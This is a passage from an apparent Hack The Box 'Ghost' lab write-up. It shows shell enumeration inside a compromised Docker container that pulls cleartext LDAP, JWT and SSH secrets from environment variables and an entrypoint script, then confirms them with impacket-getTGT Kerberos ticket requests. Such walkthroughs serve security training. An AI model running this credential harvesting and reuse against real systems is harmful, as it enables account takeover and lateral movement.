Docker Container
root@621de11273cb:/# file /bin/bash ; uname -a ; cat /etc/*release
/bin/bash: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f6101dbf7496e744703ecab8c33c2cc348805f7f, for GNU/Linux 3.2.0, stripped
Linux 621de11273cb 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
VERSION="12 (bookworm)"
VERSION_CODENAME=bookworm
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"Debian GNU/Linux 12 (bookworm)
5.15.0-113-generic
Environment Variables
root@621de11273cb:/# env
DATABASE_URL=./database.sqlite
HOSTNAME=621de11273cb
PWD=/
HOME=/root
CARGO_HOME=/usr/local/cargo
LDAP_BIND_DN=CN=Intranet Principal,CN=Users,DC=ghost,DC=htb
LDAP_HOST=ldap://windows-host:389
LDAP_BIND_PASSWORD=He!KA9oKVT3rL99j
TERM=xterm-256color
DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe
RUSTUP_HOME=/usr/local/rustup
ROCKET_ADDRESS=0.0.0.0
SHLVL=2
RUST_VERSION=1.79.0
PATH=/usr/local/cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
JWT_SECRET=*xopkAGbLyg9bK_A
_=/usr/bin/env
OLDPWD=/rootAlongside the DEV_INTRANET_KEY attribute, there is also JWT_SECRET;*xopkAGbLyg9bK_A
Additionally, there is a CLEARTEXT credential of the intranet_principal account; He!KA9oKVT3rL99j
Validation for intranet_principal
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ impacket-getTGT GHOST.HTB/intranet_principal@dc01.ghost.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: He!KA9oKVT3rL99j
[*] Saving ticket in intranet_principal@dc01.ghost.htb.ccacheValidated
TGT generated for the intranet_principal account
docker-entrypoint.sh
root@621de11273cb:/# ll
ll
total 80K
4.0K drwxrwxrwt 1 root root 4.0K Jul 15 21:45 tmp
0 drwxr-xr-x 5 root root 340 Jul 15 17:18 dev
0 dr-xr-xr-x 13 root root 0 Jul 15 17:18 sys
0 dr-xr-xr-x 202 root root 0 Jul 15 17:18 proc
4.0K drwx------ 1 root root 4.0K Jul 5 15:17 root
4.0K drwxr-xr-x 1 root root 4.0K Jul 5 15:17 .
4.0K drwxr-xr-x 1 root root 4.0K Jul 5 15:17 ..
0 -rwxr-xr-x 1 root root 0 Jul 5 15:17 .dockerenv
4.0K drwxr-xr-x 1 root root 4.0K Jul 5 15:17 etc
8.0K drwxr-xr-x 1 root root 4.0K Jul 5 15:15 app
8.0K drwxr-xr-x 1 root root 4.0K Jul 5 14:29 run
0 lrwxrwxrwx 1 root root 7 Jul 1 00:00 bin -> usr/bin
0 lrwxrwxrwx 1 root root 7 Jul 1 00:00 lib -> usr/lib
0 lrwxrwxrwx 1 root root 9 Jul 1 00:00 lib64 -> usr/lib64
4.0K drwxr-xr-x 2 root root 4.0K Jul 1 00:00 media
4.0K drwxr-xr-x 2 root root 4.0K Jul 1 00:00 mnt
4.0K drwxr-xr-x 2 root root 4.0K Jul 1 00:00 opt
0 lrwxrwxrwx 1 root root 8 Jul 1 00:00 sbin -> usr/sbin
4.0K drwxr-xr-x 2 root root 4.0K Jul 1 00:00 srv
8.0K drwxr-xr-x 1 root root 4.0K Jul 1 00:00 usr
8.0K drwxr-xr-x 1 root root 4.0K Jul 1 00:00 var
4.0K drwxr-xr-x 2 root root 4.0K Mar 29 17:20 boot
4.0K drwxr-xr-x 2 root root 4.0K Mar 29 17:20 home
4.0K -rwxr-xr-x 1 root root 327 Feb 1 08:57 docker-entrypoint.shThere is an interesting file at the system root; docker-entrypoint.sh
root@621de11273cb:/# cat docker-entrypoint.sh
#!/bin/bash
mkdir /root/.ssh
mkdir /root/.ssh/controlmaster
printf 'Host *\n ControlMaster auto\n ControlPath ~/.ssh/controlmaster/h:%%p\n ControlPersist yes' > /root/.ssh/config
sshpass -p 'uxLmt*udNc6t3HrF' ssh -o "StrictHostKeyChecking no" florence.ramirez@ghost.htb@dev-workstation exit
exec /app/ghost_intranetThe docker-entrypoint.sh file contains the CLEARTEXT SSH credential of the florence.ramirez user; uxLmt*udNc6t3HrF
Validation for florence.ramirez
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ impacket-getTGT GHOST.HTB/florence.ramirez@dc01.ghost.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: uxLmt*udNc6t3HrF
[*] Saving ticket in florence.ramirez@dc01.ghost.htb.ccacheValidated
TGT generated for the florence.ramirez user